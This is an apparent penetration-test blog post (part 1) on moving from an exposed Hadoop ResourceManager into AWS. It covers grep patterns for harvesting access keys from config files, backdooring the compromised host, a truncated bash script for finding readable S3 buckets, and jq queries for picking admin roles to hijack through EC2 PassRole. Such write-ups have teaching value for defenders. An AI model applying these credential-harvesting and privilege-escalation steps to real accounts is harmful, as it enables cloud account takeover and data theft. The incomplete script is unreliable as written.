Jimm Wayans

Part 1 – AWS Security

Introduction: In this real-world case study, we delve into the enumeration and strategic utilization of AWS IAM permissions. It is strongly recommended that you familiarize yourself with my prior article explaining the intricacies of IAM permissions, despite its length, as it serves as a foundational prerequisite for comprehending the tactics employed here. Furthermore, to maintain focus on the more intricate aspects of our exploitation efforts, we will not delve extensively into the simpler vulnerabilities we encountered (some of which have been previously addressed in a separate writeup).

Throughout this study, we will explore the manual process of enumerating IAM policies and roles, as well as explore automated tools designed for this purpose, all while emphasizing the importance of not placing absolute trust in automation. Additionally, we will provide a brief tutorial on using “jq.”

Initiating Network Access: My initial point of entry into the network was discovered through a Nessus scan of a publicly accessible AWS endpoint. This scan revealed the presence of an exposed, unauthenticated ResourceManager service within a Hadoop instance. If you recall, this vulnerability was previously discussed in my writeup on Hadoop and MCollective exploitation, and it can be readily exploited using Metasploit to achieve Remote Code Execution (RCE).

Having successfully compromised this instance and swiftly establishing a couple of backdoors to ensure continued access, I commenced network scanning. Eventually, I identified a master Hadoop node with a service exposed on port 9298, accessible via an internal interface within the subnet.

I confirmed that it hosted configuration files for Hadoop and proceeded to download all the files for analysis. In AWS environments, one of the most valuable discoveries you can make is AWS access keys and secret keys, which can be located using the regular expressions provided here: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10

AWS provides three methods for accessing resources:

  1. Through the web console
  2. Through the command line interface (CLI)
  3. Through APIs

To use the CLI, you require an access key, a secret key, and optionally a token. Access keys and secret keys can be identified using the following regular expressions:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' *
grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' *

After obtaining all the necessary files, I conducted a search and located a match in a file called “core-site.xml.”

Next, I employed the tool “enumerate-iam.py” to perform a brute-force analysis of the permissions available to that account.

aws enumerate

I observed that the account had the ability to list S3 buckets but did not appear to possess admin privileges. To conduct a quick privilege escalation check, I used RhinoSecurityLab’s “aws_escalate.py,” a tool I previously mentioned in my article on IAM permissions.

iam permissions

Unfortunately, it appeared that the account did not even have “GetUser” privileges. However, there were still other avenues to explore. Let’s return to the S3 route.

Pivoting for Access: We needed to configure a profile with the obtained credentials and initiate enumeration.

aws configure --profile test
aws security
aws --profile test s3 ls

aws security

aws security

There were approximately 180 buckets. We began reading them with:

aws --profile test s3 ls s3://backup-db-logs

aws security

This also presented a challenge as it turned out that the account had permissions to list the buckets but not to read them. To identify buckets that we could read, various tools were available, but we preferred to create our own scripts for better control over the process:

for i in "$@" ; do
if [[ $i == "--profile" ]] ; then
profile=$(echo "$@" | awk '{for(i=1;i<=NF;i++) if ($i=="--profile") print $(i+1)}')
AWS_ACCESS_KEY_ID=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | head -n 1)
AWS_SECRET_ACCESS_KEY=$(cat /root/.aws/credentials | grep -i "$profile" -A 2 | grep -i = | cut -d " " -f 3 | tail -n 1)
echo "Enumerating the buckets..."
aws --profile "$profile" s3 ls | cut -d ' ' -f 3 > /tmp/buckets
echo "You can read the following buckets:"
for i in $(cat /tmp/buckets); do
result=$(aws --profile "$profile" s3 ls s3://"$i" 2>/dev/null | head -n 1)
if [ ! -z "$result" ]; then
echo "$i" | tee /tmp/readBuckets
unset result


Invoke the script using:

bash enumerateReadBuckets.sh --profile test

aws security

We only had access to four buckets, which was a modest result. Let’s begin syncing all the information for local analysis.

for i in $(enumerateReadBuckets --profile test | tail -n +1); do aws s3 sync s3://"$i" .; done

aws security

However, our script did not return as expected. While we weren’t certain about the issue at that moment, this situation is not uncommon during penetration testing, so we proceeded with manual enumeration.

We started with our first bucket, which we’ll refer to as “bucket1.”

aws --profile test s3 ls s3://bucket1
aws security
We found a “conf” directory, which seemed promising.
aws --profile test s3 ls s3://bucket1/conf/
aws security
Wait, wasn’t “core-site.xml” the first file we discovered? Let’s download it and search for credentials.
aws --profile test s3 cp s3://bucket1/conf/hadoop/core-site.xml .

aws security

Excellent! We found new credentials. Let’s create a new profile to use them.

aws configure --profile test2

aws security

Now, let’s perform a brute-force analysis of our permissions:

./aws_escalate.py --access-key-id AKID --secret-key SK

aws securityThis new account appears to have significantly more permissions than our initial one. Let’s attempt to add a new user:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER

aws security

Unfortunately, we still did not obtain an admin account. However, we managed to escalate privileges manually. Let’s explore how.

aws security

Now, this is where our reasonably proficient knowledge of the AWS CLI becomes advantageous. The “aws_escalate” script relies on the “GetUser” operation to retrieve information about the current user. However, the “test2” account lacks the necessary “GetUser” permissions. Fortunately, there are alternative methods for obtaining information about the user you’re operating under. One such method involves using the Security Token Service API:

aws sts get-caller-identity

aws security

Now that we’ve identified the user, we can specify it manually:

./aws_escalate.py --access-key-id AKID --secret-key SK --user-name USER

aws security

The script might indicate that no methods are possible due to the user’s lack of permissions to execute the methods it uses. However, we were able to manually escalate privileges with this user. Let’s explore how.

Next, we need to find the ideal role to impersonate. If you recall the permissions associated with our “test2” user, many of them were related to EC2. Referring back to Rhino’s excellent blog post, we can see that method 3 actually involves using EC2:

Description: An attacker with the iam:PassRole and ec2:RunInstances permissions can create a new EC2 instance and assign an existing EC2 instance profile/service role to it. They can then log in to the instance and retrieve the associated AWS keys from the EC2 instance metadata, granting access to all the permissions associated with the assigned instance profile/service role.

Before we proceed, it’s essential to clarify that while a script is an efficient way to enumerate information, it usually cannot guarantee with 100% certainty whether privilege escalation is possible. This is because:

  1. Most privilege escalations depend on multiple factors, not all of which are straightforward to correlate.
  2. Amazon’s permissions are highly granular, meaning you might have permissions for certain actions (e.g., listing buckets) but not for others (e.g., reading the contents of those buckets).

Consider the method mentioned above. Having PassRole and RunInstances privileges alone isn’t sufficient. You also need to identify which role to impersonate and establish a connection with the instance, which might require pre-existing SSH keys or other methods. Additionally, it depends on the instance’s security group configurations. Enumerating security groups is essential to determine which one to assign to the instance or if you have privileges to create new ones.

However, granular permissions offer more opportunities than initially apparent, as we’ll explore further.

Now, the first step is to find a role suitable for hijacking. Let’s check if we can enumerate roles using:

aws --profile PROFILE iam list-roles | head -n 10

aws security

Great! We have list-roles privileges. Now, there are two criteria we need for identifying a suitable role for hijacking:

  1. The role should have an Administrator policy or a similar highly privileged policy attached.
  2. The role’s trust policy should include Amazon’s EC2 service to allow instances to assume the role.

For the first criterion, we can list the associated managed policies with:

aws --profile PROFILE iam list-attached-role-policies --role-name ROLE

We can also list the inline policies with:

aws --profile PROFILE iam list-role-policies --role-name ROLE

Let’s attempt this with the “Administrators” role as an example:

aws security

aws --profile PROFILE iam list-attached-role-policies --role-name Administrators

Great! Now, let’s try to retrieve the trust relationship document (the assume role policy) to see which entities can assume this role. We can do this with:

aws --profile PROFILE iam get-role --role-name ROLE

This command should provide the output containing trust relationship information if your account has the necessary permissions. However, in the case of the “test2” account, this information isn’t accessible.

aws security

This is the output you should get, if your account has permissions

aws security

This is the output we got with the test2 account

But remember what we discussed about granular permissions? There are often multiple ways to obtain the same information. In this case, the user didn’t have permissions to use get-role, but it did have permissions to use list-roles. Amazon’s documentation states that this call is used to list roles with a specified path prefix, and if none are found, it returns an empty list. However, this definition can be misleading. With this call, you can specify the --path-prefix to search for roles with a specific prefix. If you omit it, it defaults to a slash (“/”), effectively obtaining a list of all roles—replacing the need for get-role for our specific use case. Anyways, let’s give it a try:

aws --profile PROFILE iam list-roles

aws security

Great! Now, we need a way to list the roles that have an assume role policy with AWS EC2 as a trustee. To filter these roles, we’ll use jq, a tool for parsing JSON output. To explain how to use it, let’s break it down step by step. First, let’s examine the structure we need to parse. Let’s consider one role from the output:

aws security

The information we need is listed under “Principal,” and it should look something like:

"Principal": {
"Service": "ec2.amazonaws.com"

Let’s select only the fields we’re interested in with:

aws --profile test2 iam list-roles | jq -r '.Roles[] | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

This command will filter for the RoleName and the Principal Service.

aws security

However, the output may not match the example we provided earlier because not all results will look exactly the same. Some might involve a different Principal, such as a Federated Principal:

This complexity makes parsing the output a bit harder, but not impossible. Let’s filter only the elements where “Principal.Service” is not null:

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service'

We’re getting closer. Now, let’s refine the results:

aws security

aws --profile test2 iam list-roles | jq -r '.Roles[] | select(.AssumeRolePolicyDocument.Statement[].Principal.Service != null) | .RoleName, .AssumeRolePolicyDocument.Statement[].Principal.Service' | grep -B 1 "ec2.amazonaws.com" | grep -v "ec2.amazonaws.com" | sort -u | uniq

This command will retrieve all the results where “Principal.Service” is present, along with the Role Name. It will then remove the unnecessary “ec2.amazonaws.com” entries and sort and remove duplicates.

aws security

Now, we have identified potential candidates for instance role hijacking. The next step is to get the associated policies for each candidate using list-attached-role-policies and list-role-policies, as mentioned earlier. After a few minutes, we find a role with an Administrator policy attached. For the sake of illustration, let’s call it “danger-role.” It’s quite evocative and reminds me of “danger-zone,” which I appreciate as an Archer fan.

aws security

 #aws #awssecurity #webapsecurity #cloudsecurity

End of part 1, aprt 2 coming soon….

× Need my services?